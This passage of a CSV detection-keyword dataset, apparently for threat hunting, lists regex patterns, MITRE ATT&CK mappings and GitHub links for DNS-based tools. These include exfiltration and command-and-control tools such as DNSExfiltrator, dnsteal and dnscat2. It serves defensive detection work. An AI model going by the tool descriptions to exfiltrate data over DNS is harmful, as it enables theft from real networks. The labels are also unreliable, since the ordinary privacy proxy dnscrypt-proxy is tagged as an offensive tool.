-resolve*",".{0,1000}dnscrypt\-proxy\s\-resolve.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy -service*",".{0,1000}dnscrypt\-proxy\s\-service.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscryptproxy.exe*",".{0,1000}dnscryptproxy\.exe.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy.exe*",".{0,1000}dnscrypt\-proxy\.exe.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy.socket*",".{0,1000}dnscrypt\-proxy\.socket.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS 
proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy.toml*",".{0,1000}dnscrypt\-proxy\.toml.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-android_arm-*.zip*",".{0,1000}dnscrypt\-proxy\-android_arm\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-android_arm64-*.zip*",".{0,1000}dnscrypt\-proxy\-android_arm64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-android_i386-*.zip*",".{0,1000}dnscrypt\-proxy\-android_i386\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS 
proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-android_x86_64-*.zip*",".{0,1000}dnscrypt\-proxy\-android_x86_64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-dragonflybsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-dragonflybsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-freebsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" 
"*dnscrypt-proxy-freebsd_arm-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_arm\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-freebsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_arm-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_arm\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_arm64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_arm64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_mips-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_mips64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_mips64le-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips64le\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - 
T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_mipsle-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mipsle\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_riscv64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_riscv64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_x86_64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_x86_64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-macos_arm64-*.zip*",".{0,1000}dnscrypt\-proxy\-macos_arm64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - 
Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-macos_x86_64-*.zip*",".{0,1000}dnscrypt\-proxy\-macos_x86_64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-master*",".{0,1000}dnscrypt\-proxy\-master.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-netbsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-netbsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-netbsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-netbsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - 
DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-openbsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-openbsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-openbsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-openbsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-solaris_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-solaris_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-win32-*.zip*",".{0,1000}dnscrypt\-proxy\-win32\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for 
modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-win64-*.zip*",".{0,1000}dnscrypt\-proxy\-win64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*DNS-Enum-*-*.log*",".{0,1000}DNS\-Enum\-.{0,1000}\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*dnsenum.pl*",".{0,1000}dnsenum\.pl.{0,1000}","offensive_tool_keyword","dnsenum","multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.","T1218 - T1018 - T1190 - T1590 - T1012","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/fwaeytens/dnsenum","1","1","N/A","N/A","6","559","130","2019-10-08T19:58:40Z","2014-01-10T14:47:09Z" "*dnsexfiltrator.*",".{0,1000}dnsexfiltrator\..{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","9","827","180","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z" "*DNSExfiltratorLib*",".{0,1000}DNSExfiltratorLib.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","9","827","180","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z" "*DNSListener.py*",".{0,1000}DNSListener\.py.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*dnslog--airvent.txt*",".{0,1000}dnslog\-\-airvent\.txt.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" "*dnslytics-get-rootdomains*",".{0,1000}dnslytics\-get\-rootdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*dnsmastermind.rb*",".{0,1000}dnsmastermind\.rb.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control 
(C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnsmorph*",".{0,1000}dnsmorph.{0,1000}","offensive_tool_keyword","dnsmorph","DNSMORPH is a domain name permutation engine. inspired by dnstwist. It is written in Go making for a compact and very fast tool. It robustly handles any domain or subdomain supplied and provides a number of configuration options to tune permutation runs.","T1568.002 - T1568.003 - T1568.001 - T1568.004","TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/netevert/dnsmorph","1","1","N/A","N/A","3","257","43","2023-08-08T06:38:59Z","2018-02-20T19:13:35Z" "*dnspayload.bin*",".{0,1000}dnspayload\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*DNS-Persist.git*",".{0,1000}DNS\-Persist\.git.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*dnsproxy start scripts*",".{0,1000}dnsproxy\sstart\sscripts.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnsrecon -*",".{0,1000}dnsrecon\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*dnsrecon*",".{0,1000}dnsrecon.{0,1000}","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. 
This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/darkoperator/dnsrecon","1","1","N/A","6","10","2480","525","2024-04-29T05:52:23Z","2010-12-16T03:25:49Z" "*dnsrecon-zonetransfer*",".{0,1000}dnsrecon\-zonetransfer.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*DnsSpoof.ps1*",".{0,1000}DnsSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DNSStager payloads Available*",".{0,1000}DNSStager\spayloads\sAvailable.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*DNSStager will 
*",".{0,1000}DNSStager\swill\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*dnsteal.git*",".{0,1000}dnsteal\.git.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1664","230","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" "*dnsteal.py*",".{0,1000}dnsteal\.py.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1664","230","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" "*dnsteal-master*",".{0,1000}dnsteal\-master.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1664","230","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" "*dnstracer*",".{0,1000}dnstracer.{0,1000}","offensive_tool_keyword","DNSTracer","This is a python application that traces how a DNS query is performed from a client machine to the server.","T1556 - T1016 - T1046","TA0007 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/pcoder/DNSTracer","1","0","N/A","3","1","6","1","2011-11-11T22:06:48Z","2011-07-07T18:36:07Z" 
